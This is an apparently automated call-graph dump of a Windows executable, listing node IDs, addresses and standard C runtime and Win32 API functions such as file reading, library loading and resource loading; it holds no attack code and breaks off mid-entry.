CreateWindowExW CreateWindowExW ShowWindow ShowWindow 98591->98593 98592 84d4a5 98593->98434 98595 814406 _memset 98594->98595 100055 814213 98595->100055 98606 8550ed 98605->98606 98618 820b55 98605->98618 98683->98418 98684->98430 98686 841b90 __write_nolock 98685->98686 98687 814871 GetModuleFileNameW 98686->98687 98688 817f41 59 API calls 98687->98688 98689 814897 98688->98689 98690 8148ae 60 API calls 98689->98690 98691 8148a1 Mailbox 98690->98691 98715 830ffe 98712->98715 98714 831018 98714->98461 98715->98714 98717 83101c std::exception::exception 98715->98717 98722 83594c 98715->98722 98739 8335e1 DecodePointer 98715->98739 98740 8387db RaiseException 98717->98740 98719 831046 98741 838711 58 API calls _free 98719->98741 98721 831058 98721->98461 98723 8359c7 98722->98723 98731 835958 98722->98731 98748 8335e1 DecodePointer 98723->98748 98725 8359cd 98749 838d68 58 API calls __getptd_noexit 98725->98749 98728 83598b RtlAllocateHeap 98728->98731 98738 8359bf 98728->98738 98730 8359b3 98746 838d68 58 API calls __getptd_noexit 98730->98746 98731->98728 98731->98730 98732 835963 98731->98732 98736 8359b1 98731->98736 98745 8335e1 DecodePointer 98731->98745 98732->98731 98742 83a3ab 58 API calls __NMSG_WRITE 98732->98742 98743 83a408 58 API calls 6 library calls 98732->98743 98744 8332df GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 98732->98744 98747 838d68 58 API calls __getptd_noexit 98736->98747 98738->98715 98739->98715 98740->98719 98741->98721 98742->98732 98743->98732 98745->98731 98746->98736 98747->98738 98748->98725 98749->98738 98751 813d50 __write_nolock 98750->98751 98752 817d2c 59 API calls 98751->98752 98756 813eb6 Mailbox 98751->98756 98754 813d82 98752->98754 98762 813db8 Mailbox 98754->98762 98876 817b52 98754->98876 98755 813e89 98755->98756 98757 817f41 59 API calls 98755->98757 98756->98468 98759 813eaa 98757->98759 98758 817f41 59 API calls 98758->98762 98761 813f84 59 API calls 98759->98761 98760 817b52 59 API calls 98760->98762 98761->98756 98762->98755 98762->98756 98762->98758 98762->98760 98879 813f84 98762->98879 98889 814d13 98764->98889 98769 814f68 LoadLibraryExW 98899 814cc8 98769->98899 98770 84dd0f 98771 814faa 84 API calls 98770->98771 98773 84dd16 98771->98773 98775 814cc8 3 API calls 98773->98775 98777 84dd1e 98775->98777 98925 81506b 98777->98925 98778 814f8f 98778->98777 98779 814f9b 98778->98779 98780 814faa 84 API calls 98779->98780 98782 8137e6 98780->98782 98782->98475 98782->98476 98785 84dd45 98933 815027 98785->98933 98787 84dd52 98789 8181b2 98788->98789 98790 813801 98788->98790 99363 8180d7 98789->99363 98792 8193ea 98790->98792 98793 830ff6 Mailbox 59 API calls 98792->98793 98794 81380d 98793->98794 98794->98489 98796 81862b 98795->98796 98798 818652 98796->98798 99367 818b13 69 API calls Mailbox 98796->99367 98798->98492 98800 813f05 98799->98800 98801 813eec 98799->98801 98803 817d2c 59 API calls 98800->98803 98802 8181a7 59 API calls 98801->98802 98804 81388b 98802->98804 98803->98804 98805 83313d 98804->98805 98806 8331be 98805->98806 98807 833149 98805->98807 99370 8331d0 60 API calls 3 library calls 98806->99370 98814 83316e 98807->98814 99368 838d68 58 API calls __getptd_noexit 98807->99368 98810 8331cb 98810->98514 98811 833155 99369 838ff6 9 API calls __wfsopen 98811->99369 98813 833160 98813->98514 98814->98514 98816 819436 98815->98816 98817 830ff6 Mailbox 59 API calls 98816->98817 98818 819444 98817->98818 98819 813936 98818->98819 99371 81935c 59 API calls Mailbox 98818->99371 98821 8191b0 98819->98821 99372 8192c0 98821->99372 98823 830ff6 Mailbox 59 API calls 98824 813944 98823->98824 98826 819040 98824->98826 98825 8191bf 98825->98823 98825->98824 98827 84f5a5 98826->98827 98829 819057 98826->98829 98827->98829 99387 818d3b 59 API calls Mailbox 98827->99387 98830 8191a0 98829->98830 98831 819158 98829->98831 98834 81915f 98829->98834 99386 819e9c 60 API calls Mailbox 98830->99386 98833 830ff6 Mailbox 59 API calls 98831->98833 98833->98834 98834->98542 98836 815045 85 API calls 98835->98836 98837 879854 98836->98837 99388 8799be 98837->99388 98840 81506b 74 API calls 98841 879881 98840->98841 98842 81506b 74 API calls 98841->98842 98843 879891 98842->98843 98844 81506b 74 API calls 98843->98844 98845 8798ac 98844->98845 98846 81506b 74 API calls 98845->98846 98847 8798c7 98846->98847 98848 815045 85 API calls 98847->98848 98849 8798de 98848->98849 98850 83594c __crtCompareStringA_stat 58 API calls 98849->98850 98851 8798e5 98850->98851 98852 83594c __crtCompareStringA_stat 58 API calls 98851->98852 98853 8798ef 98852->98853 98854 81506b 74 API calls 98853->98854 98855 879903 98854->98855 98856 879393 GetSystemTimeAsFileTime 98855->98856 98857 879916 98856->98857 98858 879940 98857->98858 98859 87992b 98857->98859 98861 879946 98858->98861 98862 8799a5 98858->98862 98860 832f95 _free 58 API calls 98859->98860 98864 879931 98860->98864 99394 878d90 98861->99394 98863 832f95 _free 58 API calls 98862->98863 98866 84d3c1 98863->98866 98867 832f95 _free 58 API calls 98864->98867 98866->98479 98870 814faa 98866->98870 98867->98866 98869 832f95 _free 58 API calls 98869->98866 98871 814fb4 98870->98871 98872 814fbb 98870->98872 98873 8355d6 __fcloseall 83 API calls 98871->98873 98874 814fdb FreeLibrary 98872->98874 98875 814fca 98872->98875 98873->98872 98874->98875 98875->98479 98885 817faf 98876->98885 98878 817b5d 98878->98754 98880 813f92 98879->98880 98884 813fb4 _memmove 98879->98884 98882 830ff6 Mailbox 59 API calls 98880->98882 98881 830ff6 Mailbox 59 API calls 98883 813fc8 98881->98883 98882->98884 98883->98762 98884->98881 98886 817fc2 98885->98886 98888 817fbf _memmove 98885->98888 98887 830ff6 Mailbox 59 API calls 98886->98887 98887->98888 98888->98878 98938 814d61 98889->98938 98892 814d3a 98894 814d53 98892->98894 98895 814d4a FreeLibrary 98892->98895 98893 814d61 2 API calls 98893->98892 98896 83548b 98894->98896 98895->98894 98942 8354a0 98896->98942 98898 814f5c 98898->98769 98898->98770 99100 814d94 98899->99100 98902 814ced 98903 814d08 98902->98903 98904 814cff FreeLibrary 98902->98904 98906 814dd0 98903->98906 98904->98903 98905 814d94 2 API calls 98905->98902 98907 830ff6 Mailbox 59 API calls 98906->98907 98908 814de5 98907->98908 99104 81538e 98908->99104 98910 814df1 _memmove 98911 814e2c 98910->98911 98912 814f21 98910->98912 98913 814ee9 98910->98913 98914 815027 69 API calls 98911->98914 99118 879ba5 95 API calls 98912->99118 99107 814fe9 CreateStreamOnHGlobal 98913->99107 98920 814e35 98914->98920 98917 81506b 74 API calls 98917->98920 98918 814ec9 98918->98778 98920->98917 98920->98918 98921 84dcd0 98920->98921 99113 815045 98920->99113 98922 815045 85 API calls 98921->98922 98923 84dce4 98922->98923 98924 81506b 74 API calls 98923->98924 98924->98918 98926 84ddf6 98925->98926 98927 81507d 98925->98927 99142 835812 98927->99142 98930 879393 99340 8791e9 98930->99340 98932 8793a9 98932->98785 98934 815036 98933->98934 98935 84ddb9 98933->98935 99345 835e90 98934->99345 98937 81503e 98937->98787 98939 814d2e 98938->98939 98940 814d6a LoadLibraryA 98938->98940 98939->98892 98939->98893 98940->98939 98941 814d7b GetProcAddress 98940->98941 98941->98939 98945 8354ac __wfsopen 98942->98945 98943 8354bf 98991 838d68 58 API calls __getptd_noexit 98943->98991 98945->98943 98947 8354f0 98945->98947 98946 8354c4 98992 838ff6 9 API calls __wfsopen 98946->98992 98961 840738 98947->98961 98950 8354f5 98951 83550b 98950->98951 98952 8354fe 98950->98952 98954 835535 98951->98954 98955 835515 98951->98955 98993 838d68 58 API calls __getptd_noexit 98952->98993 98976 840857 98954->98976 98994 838d68 58 API calls __getptd_noexit 98955->98994 98957 8354cf __wfsopen @_EH4_CallFilterFunc@8 98957->98898 98962 840744 __wfsopen 98961->98962 98963 839e4b __lock 58 API calls 98962->98963 98974 840752 98963->98974 98964 8407c6 98996 84084e 98964->98996 98965 8407cd 99001 838a5d 58 API calls 2 library calls 98965->99001 98968 8407d4 98968->98964 99002 83a06b InitializeCriticalSectionAndSpinCount 98968->99002 98969 840843 __wfsopen 98969->98950 98971 839ed3 __mtinitlocknum 58 API calls 98971->98974 98973 8407fa EnterCriticalSection 98973->98964 98974->98964 98974->98965 98974->98971 98999 836e8d 59 API calls __lock 98974->98999 99000 836ef7 LeaveCriticalSection LeaveCriticalSection _doexit 98974->99000 98984 840877 __wopenfile 98976->98984 98977 840891 99007 838d68 58 API calls __getptd_noexit 98977->99007 98979 840896 99008 838ff6 9 API calls __wfsopen 98979->99008 98981 835540 98995 835562 LeaveCriticalSection LeaveCriticalSection _fseek 98981->98995 98982 840aaf 99004 8487f1 98982->99004 98984->98977 98984->98984 98990 840a4c 98984->98990 99009 833a0b 60 API calls 2 library calls 98984->99009 98986 840a45 98986->98990 99010 833a0b 60 API calls 2 library calls 98986->99010 98988 840a64 98988->98990 99011 833a0b 60 API calls 2 library calls 98988->99011 98990->98977 98990->98982 98991->98946 98992->98957 98993->98957 98994->98957 98995->98957 99003 839fb5 LeaveCriticalSection 98996->99003 98998 840855 98998->98969 98999->98974 99000->98974 99001->98968 99002->98973 99003->98998 99012 847fd5 99004->99012 99006 84880a 99006->98981 99007->98979 99008->98981 99009->98986 99010->98988 99011->98990 99015 847fe1 __wfsopen 99012->99015 99013 847ff7 99097 838d68 58 API calls __getptd_noexit 99013->99097 99015->99013 99017 84802d 99015->99017 99016 847ffc 99098 838ff6 9 API calls __wfsopen 99016->99098 99023 84809e 99017->99023 99020 848049 99099 848072 LeaveCriticalSection __unlock_fhandle 99020->99099 99022 848006 __wfsopen 99022->99006 99024 8480be 99023->99024 99025 83471a __wsopen_nolock 58 API calls 99024->99025 99027 8480da 99025->99027 99026 839006 __invoke_watson 8 API calls 99028 8487f0 99026->99028 99029 848114 99027->99029 99036 848137 99027->99036 99071 848211 99027->99071 99030 847fd5 __wsopen_helper 103 API calls 99028->99030 99031 838d34 __lseeki64 58 API calls 99029->99031 99032 84880a 99030->99032 99033 848119 99031->99033 99032->99020 99034 838d68 __wfsopen 58 API calls 99033->99034 99035 848126 99034->99035 99038 838ff6 __wfsopen 9 API calls 99035->99038 99037 8481f5 99036->99037 99045 8481d3 99036->99045 99039 838d34 __lseeki64 58 API calls 99037->99039 99040 848130 99038->99040 99041 8481fa 99039->99041 99040->99020 99042 838d68 __wfsopen 58 API calls 99041->99042 99043 848207 99042->99043 99044 838ff6 __wfsopen 9 API calls 99043->99044 99044->99071 99046 83d4d4 __alloc_osfhnd 61 API calls 99045->99046 99047 8482a1 99046->99047 99048 8482ce 99047->99048 99049 8482ab 99047->99049 99051 847f4d ___createFile GetModuleHandleW GetProcAddress CreateFileW 99048->99051 99050 838d34 __lseeki64 58 API calls 99049->99050 99052 8482b0 99050->99052 99062 8482f0 99051->99062 99053 838d68 __wfsopen 58 API calls 99052->99053 99055 8482ba 99053->99055 99054 84836e GetFileType 99056 848379 GetLastError 99054->99056 99057 8483bb 99054->99057 99060 838d68 __wfsopen 58 API calls 99055->99060 99061 838d47 __dosmaperr 58 API calls 99056->99061 99067 83d76a __set_osfhnd 59 API calls 99057->99067 99058 84833c GetLastError 99059 838d47 __dosmaperr 58 API calls 99058->99059 99063 848361 99059->99063 99060->99040 99064 8483a0 CloseHandle 99061->99064 99062->99054 99062->99058 99065 847f4d ___createFile GetModuleHandleW GetProcAddress CreateFileW 99062->99065 99069 838d68 __wfsopen 58 API calls 99063->99069 99064->99063 99068 8483ae 99064->99068 99066 848331 99065->99066 99066->99054 99066->99058 99073 8483d9 99067->99073 99070 838d68 __wfsopen 58 API calls 99068->99070 99069->99071 99072 8483b3 99070->99072 99071->99026 99072->99063 99074 848594 99073->99074 99075 841b11 __lseeki64_nolock 60 API calls 99073->99075 99093 84845a 99073->99093 99074->99071 99076 848767 CloseHandle 99074->99076 99077 848443 99075->99077 99078 847f4d ___createFile GetModuleHandleW GetProcAddress CreateFileW 99076->99078 99080 838d34 __lseeki64 58 API calls 99077->99080 99077->99093 99079 84878e 99078->99079 99081 848796 GetLastError 99079->99081 99082 8487c2 99079->99082 99080->99093 99083 838d47 __dosmaperr 58 API calls 99081->99083 99082->99071 99085 8487a2 99083->99085 99084 84848c 99088 8499f2 __chsize_nolock 82 API calls 99084->99088 99084->99093 99089 83d67d __free_osfhnd 59 API calls 99085->99089 99086 8410ab 70 API calls __read_nolock 99086->99093 99087 840d2d __close_nolock 61 API calls 99087->99093 99088->99084 99089->99082 99090 83dac6 __write 78 API calls 99090->99093 99091 848611 99092 840d2d __close_nolock 61 API calls 99091->99092 99094 848618 99092->99094 99093->99074 99093->99084 99093->99086 99093->99087 99093->99090 99093->99091 99095 841b11 60 API calls __lseeki64_nolock 99093->99095 99096 838d68 __wfsopen 58 API calls 99094->99096 99095->99093 99096->99071 99097->99016 99098->99022 99099->99022 99101 814ce1 99100->99101 99102 814d9d LoadLibraryA 99100->99102 99101->98902 99101->98905 99102->99101 99103 814dae GetProcAddress 99102->99103 99103->99101 99105 830ff6 Mailbox 59 API calls 99104->99105 99106 8153a0 99105->99106 99106->98910 99108 815020 99107->99108 99109 815003 FindResourceExW 99107->99109 99108->98911 99109->99108 99110 84dd5c LoadResource 99109->99110 99110->99108 99111 84dd71 SizeofResource 99110->99111 99111->99108 99112 84dd85 LockResource 99111->99112 99112->99108 99114 84ddd4 99113->99114 99115 815054 99113->99115 99119 835a7d 99115->99119 99117 815062 99117->98920 99118->98911 99120 835a89 __wfsopen 99119->99120 99121 835a9b 99120->99121 99123 835ac1 99120->99123 99132 838d68 58 API calls __getptd_noexit 99121->99132 99134 836e4e 99123->99134 99125 835aa0 99133 838ff6 9 API calls __wfsopen 99125->99133 99126 835ac7 99140 8359ee 83 API calls 5 library calls 99126->99140 99129 835ad6 99141 835af8 LeaveCriticalSection LeaveCriticalSection _fseek 99129->99141 99131 835aab __wfsopen 99131->99117 99132->99125 99133->99131 99135 836e80 EnterCriticalSection 99134->99135 99136 836e5e 99134->99136 99138 836e76 99135->99138 99136->99135 99137 836e66 99136->99137 99139 839e4b __lock 58 API calls 99137->99139 99138->99126 99139->99138 99140->99129 99141->99131 99145 83582d 99142->99145 99144 81508e 99144->98930 99146 835839 __wfsopen 99145->99146 99147 83584f _memset 99146->99147 99148 83587c 99146->99148 99150 835874 __wfsopen 99146->99150 99172 838d68 58 API calls __getptd_noexit 99147->99172 99149 836e4e __lock_file 59 API calls 99148->99149 99151 835882 99149->99151 99150->99144 99158 83564d 99151->99158 99154 835869 99173 838ff6 9 API calls __wfsopen 99154->99173 99161 835668 _memset 99158->99161 99171 835683 99158->99171 99159 835673 99270 838d68 58 API calls __getptd_noexit 99159->99270 99161->99159 99168 8356c3 99161->99168 99161->99171 99162 835678 99271 838ff6 9 API calls __wfsopen 99162->99271 99165 8357d4 _memset 99273 838d68 58 API calls __getptd_noexit 99165->99273 99168->99165 99168->99171 99175 834916 99168->99175 99182 8410ab 99168->99182 99250 840df7 99168->99250 99272 840f18 58 API calls 3 library calls 99168->99272 99174 8358b6 LeaveCriticalSection LeaveCriticalSection _fseek 99171->99174 99172->99154 99173->99150 99174->99150 99176 834920 99175->99176 99177 834935 99175->99177 99274 838d68 58 API calls __getptd_noexit 99176->99274 99177->99168 99179 834925 99275 838ff6 9 API calls __wfsopen 99179->99275 99181 834930 99181->99168 99183 8410e3 99182->99183 99184 8410cc 99182->99184 99186 84181b 99183->99186 99190 84111d 99183->99190 99285 838d34 58 API calls __getptd_noexit 99184->99285 99301 838d34 58 API calls __getptd_noexit 99186->99301 99187 8410d1 99286 838d68 58 API calls __getptd_noexit 99187->99286 99192 841125 99190->99192 99199 84113c 99190->99199 99191 841820 99302 838d68 58 API calls __getptd_noexit 99191->99302 99287 838d34 58 API calls __getptd_noexit 99192->99287 99195 841131 99303 838ff6 9 API calls __wfsopen 99195->99303 99196 84112a 99288 838d68 58 API calls __getptd_noexit 99196->99288 99198 841151 99289 838d34 58 API calls __getptd_noexit 99198->99289 99199->99198 99201 84116b 99199->99201 99203 841189 99199->99203 99230 8410d8 99199->99230 99201->99198 99206 841176 99201->99206 99290 838a5d 58 API calls 2 library calls 99203->99290 99276 845ebb 99206->99276 99207 841199 99208 8411a1 99207->99208 99209 8411bc 99207->99209 99291 838d68 58 API calls __getptd_noexit 99208->99291 99293 841b11 60 API calls 3 library calls 99209->99293 99210 84128a 99212 841303 ReadFile 99210->99212 99217 8412a0 GetConsoleMode 99210->99217 99215 841325 99212->99215 99216 8417e3 GetLastError 99212->99216 99214 8411a6 99292 838d34 58 API calls __getptd_noexit 99214->99292 99215->99216 99223 8412f5 99215->99223 99219 8412e3 99216->99219 99220 8417f0 99216->99220 99221 8412b4 99217->99221 99222 841300 99217->99222 99231 8412e9 99219->99231 99294 838d47 58 API calls 3 library calls 99219->99294 99299 838d68 58 API calls __getptd_noexit 99220->99299 99221->99222 99225 8412ba ReadConsoleW 99221->99225 99222->99212 99223->99231 99233 8415c7 99223->99233 99236 84135a 99223->99236 99225->99223 99227 8412dd GetLastError 99225->99227 99226 8417f5 99300 838d34 58 API calls __getptd_noexit 99226->99300 99227->99219 99230->99168 99231->99230 99232 832f95 _free 58 API calls 99231->99232 99232->99230 99233->99231 99240 8416cd ReadFile 99233->99240 99234 8413c6 ReadFile 99237 8413e7 GetLastError 99234->99237 99249 8413f1 99234->99249 99236->99234 99241 841447 99236->99241 99237->99249 99238 841504 99244 8414b4 MultiByteToWideChar 99238->99244 99297 841b11 60 API calls 3 library calls 99238->99297 99239 8414f4 99296 838d68 58 API calls __getptd_noexit 99239->99296 99243 8416f0 GetLastError 99240->99243 99247 8416fe 99240->99247 99241->99231 99241->99238 99241->99239 99241->99244 99243->99247 99244->99227 99244->99231 99247->99233 99298 841b11 60 API calls 3 library calls 99247->99298 99249->99236 99295 841b11 60 API calls 3 library calls 99249->99295 99251 840e02 99250->99251 99256 840e17 99250->99256 99337 838d68 58 API calls __getptd_noexit 99251->99337 99253 840e12 99253->99168 99254 840e07 99338 838ff6 9 API calls __wfsopen 99254->99338 99256->99253 99257 840e4c 99256->99257 99339 846234 58 API calls __malloc_crt 99256->99339 99259 834916 __fflush_nolock 58 API calls 99257->99259 99260 840e60 99259->99260 99304 840f97 99260->99304 99262 840e67 99262->99253 99263 834916 __fflush_nolock 58 API calls 99262->99263 99264 840e8a 99263->99264 99264->99253 99265 834916 __fflush_nolock 58 API calls 99264->99265 99266 840e96 99265->99266 99266->99253 99267 834916 __fflush_nolock 58 API calls 99266->99267 99268 840ea3 99267->99268 99269 834916 __fflush_nolock 58 API calls 99268->99269 99269->99253 99270->99162 99271->99171 99272->99168 99273->99162 99274->99179 99275->99181 99277 845ec6 99276->99277 99278 845ed3 99276->99278 99279 838d68 __wfsopen 58 API calls 99277->99279 99281 845edf 99278->99281 99282 838d68 __wfsopen 58 API calls 99278->99282 99280 845ecb 99279->99280 99280->99210 99281->99210 99283 845f00 99282->99283 99284 838ff6 __wfsopen 9 API calls 99283->99284 99284->99280 99285->99187 99286->99230 99287->99196 99288->99195 99289->99196 99290->99207 99291->99214 99292->99230 99293->99206 99294->99231 99295->99249 99296->99231 99297->99244 99298->99247 99299->99226 99300->99231 99301->99191 99302->99195 99303->99230 99305 840fa3 __wfsopen 99304->99305 99306 840fc7 99305->99306 99307 840fb0 99305->99307 99309 84108b 99306->99309 99312 840fdb 99306->99312 99308 838d34 __lseeki64 58 API calls 99307->99308 99311 840fb5 99308->99311 99310 838d34 __lseeki64 58 API calls 99309->99310 99313 840ffe 99310->99313 99314 838d68 __wfsopen 58 API calls 99311->99314 99315 841006 99312->99315 99316 840ff9 99312->99316 99322 838d68 __wfsopen 58 API calls 99313->99322 99317 840fbc __wfsopen 99314->99317 99319 841013 99315->99319 99320 841028 99315->99320 99318 838d34 __lseeki64 58 API calls 99316->99318 99317->99262 99318->99313 99323 838d34 __lseeki64 58 API calls 99319->99323 99321 83d446 ___lock_fhandle 59 API calls 99320->99321 99325 84102e 99321->99325 99329 841020 99322->99329 99324 841018 99323->99324 99326 838d68 __wfsopen 58 API calls 99324->99326 99327 841054 99325->99327 99328 841041 99325->99328 99326->99329 99332 838d68 __wfsopen 58 API calls 99327->99332 99330 8410ab __read_nolock 70 API calls 99328->99330 99331 838ff6 __wfsopen 9 API calls 99329->99331 99333 84104d 99330->99333 99331->99317 99334 841059 99332->99334 99336 841083 __read LeaveCriticalSection 99333->99336 99335 838d34 __lseeki64 58 API calls 99334->99335 99335->99333 99336->99317 99337->99254 99338->99253 99339->99257 99343 83543a GetSystemTimeAsFileTime 99340->99343 99342 8791f8 99342->98932 99344 835468 __aulldiv 99343->99344 99344->99342 99346 835e9c __wfsopen 99345->99346 99347 835ec3 99346->99347 99348 835eae 99346->99348 99349 836e4e __lock_file 59 API calls 99347->99349 99359 838d68 58 API calls __getptd_noexit 99348->99359 99352 835ec9 99349->99352 99351 835eb3 99360 838ff6 9 API calls __wfsopen 99351->99360 99361 835b00 67 API calls 6 library calls 99352->99361 99355 835ebe __wfsopen 99355->98937 99356 835ed4 99362 835ef4 LeaveCriticalSection LeaveCriticalSection _fseek 99356->99362 99358 835ee6 99358->99355 99359->99351 99360->99355 99361->99356 99362->99358 99365 8180e7 99363->99365 99366 8180fa _memmove 99363->99366 99364 830ff6 Mailbox 59 API calls 99364->99366 99365->99364 99365->99366 99366->98790 99367->98798 99368->98811 99369->98813 99370->98810 99371->98819 99373 8192c9 Mailbox 99372->99373 99374 84f5c8 99373->99374 99379 8192d3 99373->99379 99376 830ff6 Mailbox 59 API calls 99374->99376 99375 8192da 99375->98825 99377 84f5d4 99376->99377 99379->99375 99380 819df0 99379->99380 99382 819dfb 99380->99382 99381 819e32 99381->99379 99382->99381 99385 818e34 59 API calls Mailbox 99382->99385 99384 819e5d 99384->99379 99385->99384 99386->98834 99387->98829 99393 8799d2 __tzset_nolock _wcscmp 99388->99393 99389 81506b 74 API calls 99389->99393 99390 879866 99390->98840 99390->98866 99391 879393 GetSystemTimeAsFileTime 99391->99393 99392 815045 85 API calls 99392->99393 99393->99389 99393->99390 99393->99391 99393->99392 99395 878d9b 99394->99395 99396 878da9 99394->99396 99397 83548b 115 API calls 99395->99397 99398 878dee 99396->99398 99399 83548b 115 API calls 99396->99399 99420 878db2 99396->99420 99397->99396 99425 87901b 99398->99425 99401 878dd3 99399->99401 99401->99398 99403 878ddc 99401->99403 99402 878e32 99404 878e57 99402->99404 99405 878e36 99402->99405 99408 8355d6 __fcloseall 83 API calls 99403->99408 99403->99420 99429 878c33 99404->99429 99407 878e43 99405->99407 99410 8355d6 __fcloseall 83 API calls 99405->99410 99413 8355d6 __fcloseall 83 API calls 99407->99413 99407->99420 99408->99420 99410->99407 99411 878e85 99438 878eb5 99411->99438 99412 878e65 99414 878e72 99412->99414 99416 8355d6 __fcloseall 83 API calls 99412->99416 99413->99420 99418 8355d6 __fcloseall 83 API calls 99414->99418 99414->99420 99416->99414 99418->99420 99420->98869 99422 878ea0 99422->99420 99424 8355d6 __fcloseall 83 API calls 99422->99424 99424->99420 99426 879040 99425->99426 99428 879029 __tzset_nolock _memmove 99425->99428 99427 835812 __fread_nolock 74 API calls 99426->99427 99427->99428 99428->99402 99430 83594c __crtCompareStringA_stat 58 API calls 99429->99430 99431 878c42 99430->99431 99432 83594c __crtCompareStringA_stat 58 API calls 99431->99432 99433 878c56 99432->99433 99434 83594c __crtCompareStringA_stat 58 API calls 99433->99434 99435 878c6a 99434->99435 99436 878f97 58 API calls 99435->99436 99437 878c7d 99435->99437 99436->99437 99437->99411 99437->99412 99445 878eca 99438->99445 99439 878f82 99467 8791bf 99439->99467 99441 878c8f 74 API calls 99441->99445 99442 878e8c 99446 878f97 99442->99446 99445->99439 99445->99441 99445->99442 99471 878d2b 74 API calls 99445->99471 99472 87909c 80 API calls 99445->99472 99447 878fa4 99446->99447 99448 878faa 99446->99448 99449 832f95 _free 58 API calls 99447->99449 99450 878fbb 99448->99450 99451 832f95 _free 58 API calls 99448->99451 99449->99448 99452 832f95 _free 58 API calls 99450->99452 99453 878e93 99450->99453 99451->99450 99452->99453 99453->99422 99454 8355d6 99453->99454 99455 8355e2 __wfsopen 99454->99455 99456 8355f6 99455->99456 99457 83560e 99455->99457 99554 838d68 58 API calls __getptd_noexit 99456->99554 99459 836e4e __lock_file 59 API calls 99457->99459 99463 835606 __wfsopen 99457->99463 99461 835620 99459->99461 99460 8355fb 99555 838ff6 9 API calls __wfsopen 99460->99555 99538 83556a 99461->99538 99463->99422 99468 8791dd 99467->99468 99469 8791cc 99467->99469 99468->99442 99473 834a93 99469->99473 99471->99445 99472->99445 99474 834a9f __wfsopen 99473->99474 99475 834ad5 99474->99475 99476 834abd 99474->99476 99477 834acd __wfsopen 99474->99477 99478 836e4e __lock_file 59 API calls 99475->99478 99498 838d68 58 API calls __getptd_noexit 99476->99498 99477->99468 99480 834adb 99478->99480 99486 83493a 99480->99486 99481 834ac2 99499 838ff6 9 API calls __wfsopen 99481->99499 99488 834949 99486->99488 99494 834967 99486->99494 99487 834957 99529 838d68 58 API calls __getptd_noexit 99487->99529 99488->99487 99492 834981 _memmove 99488->99492 99488->99494 99490 83495c 99530 838ff6 9 API calls __wfsopen 99490->99530 99492->99494 99496 834916 __fflush_nolock 58 API calls 99492->99496 99501 83dac6 99492->99501 99531 834c6d 99492->99531 99537 83b05e 78 API calls 6 library calls 99492->99537 99500 834b0d LeaveCriticalSection LeaveCriticalSection _fseek 99494->99500 99496->99492 99498->99481 99499->99477 99500->99477 99502 83dad2 __wfsopen 99501->99502 99503 83daf6 99502->99503 99504 83dadf 99502->99504 99506 83db95 99503->99506 99508 83db0a 99503->99508 99505 838d34 __lseeki64 58 API calls 99504->99505 99507 83dae4 99505->99507 99509 838d34 __lseeki64 58 API calls 99506->99509 99510 838d68 __wfsopen 58 API calls 99507->99510 99511 83db32 99508->99511 99512 83db28 99508->99512 99513 83db2d 99509->99513 99521 83daeb __wfsopen 99510->99521 99515 83d446 ___lock_fhandle 59 API calls 99511->99515 99514 838d34 __lseeki64 58 API calls 99512->99514 99517 838d68 __wfsopen 58 API calls 99513->99517 99514->99513 99516 83db38 99515->99516 99518 83db4b 99516->99518 99519 83db5e 99516->99519 99520 83dba1 99517->99520 99523 83dbb5 __write_nolock 76 API calls 99518->99523 99522 838d68 __wfsopen 58 API calls 99519->99522 99524 838ff6 __wfsopen 9 API calls 99520->99524 99521->99492 99525 83db63 99522->99525 99526 83db57 99523->99526 99524->99521 99527 838d34 __lseeki64 58 API calls 99525->99527 99528 83db8d __write LeaveCriticalSection 99526->99528 99527->99526 99528->99521 99529->99490 99530->99494 99532 834c80 99531->99532 99536 834ca4 99531->99536 99533 834916 __fflush_nolock 58 API calls 99532->99533 99532->99536 99534 834c9d 99533->99534 99535 83dac6 __write 78 API calls 99534->99535 99535->99536 99536->99492 99537->99492 99539 835579 99538->99539 99540 83558d 99538->99540 99587 838d68 58 API calls __getptd_noexit 99539->99587 99541 835589 99540->99541 99543 834c6d __flush 78 API calls 99540->99543 99556 835645 LeaveCriticalSection LeaveCriticalSection _fseek 99541->99556 99545 835599 99543->99545 99544 83557e 99588 838ff6 9 API calls __wfsopen 99544->99588 99557 840dc7 99545->99557 99549 834916 __fflush_nolock 58 API calls 99550 8355a7 99549->99550 99561 840c52 99550->99561 99552 8355ad 99552->99541 99553 832f95 _free 58 API calls 99552->99553 99553->99541 99554->99460 99555->99463 99556->99463 99558 8355a1 99557->99558 99559 840dd4 99557->99559 99558->99549 99559->99558 99560 832f95 _free 58 API calls 99559->99560 99560->99558 99562 840c5e __wfsopen 99561->99562 99563 840c82 99562->99563 99564 840c6b 99562->99564 99565 840d0d 99563->99565 99568 840c92 99563->99568 99613 838d34 58 API calls __getptd_noexit 99564->99613 99618 838d34 58 API calls __getptd_noexit 99565->99618 99567 840c70 99614 838d68 58 API calls __getptd_noexit 99567->99614 99571 840cb0 99568->99571 99572 840cba 99568->99572 99615 838d34 58 API calls __getptd_noexit 99571->99615 99589 83d446 99572->99589 99573 840cb5 99619 838d68 58 API calls __getptd_noexit 99573->99619 99577 840cc0 99579 840cd3 99577->99579 99580 840cde 99577->99580 99578 840d19 99620 838ff6 9 API calls __wfsopen 99578->99620 99598 840d2d 99579->99598 99616 838d68 58 API calls __getptd_noexit 99580->99616 99584 840c77 __wfsopen 99584->99552 99585 840cd9 99617 840d05 LeaveCriticalSection __unlock_fhandle 99585->99617 99587->99544 99588->99541 99590 83d452 __wfsopen 99589->99590 99591 83d4a1 EnterCriticalSection 99590->99591 99593 839e4b __lock 58 API calls 99590->99593 99592 83d4c7 __wfsopen 99591->99592 99592->99577 99594 83d477 99593->99594 99597 83d48f 99594->99597 99621 83a06b InitializeCriticalSectionAndSpinCount 99594->99621 99622 83d4cb LeaveCriticalSection _doexit 99597->99622 99623 83d703 99598->99623 99600 840d3b 99601 840d91 99600->99601 99602 840d6f 99600->99602 99604 83d703 __lseek_nolock 58 API calls 99600->99604 99636 83d67d 59 API calls 2 library calls 99601->99636 99602->99601 99605 83d703 __lseek_nolock 58 API calls 99602->99605 99608 840d66 99604->99608 99609 840d7b FindCloseChangeNotification 99605->99609 99606 840d99 99607 840dbb 99606->99607 99637 838d47 58 API calls 3 library calls 99606->99637 99607->99585 99611 83d703 __lseek_nolock 58 API calls 99608->99611 99609->99601 99612 840d87 GetLastError 99609->99612 99611->99602 99612->99601 99613->99567 99614->99584 99615->99573 99616->99585 99617->99584 99618->99573 99619->99578 99620->99584 99621->99597 99622->99591 99624 83d70e 99623->99624 99626 83d723 99623->99626 99625 838d34 __lseeki64 58 API calls 99624->99625 99628 83d713 99625->99628 99627 838d34 __lseeki64 58 API calls 99626->99627 99631 83d748 99626->99631 99629 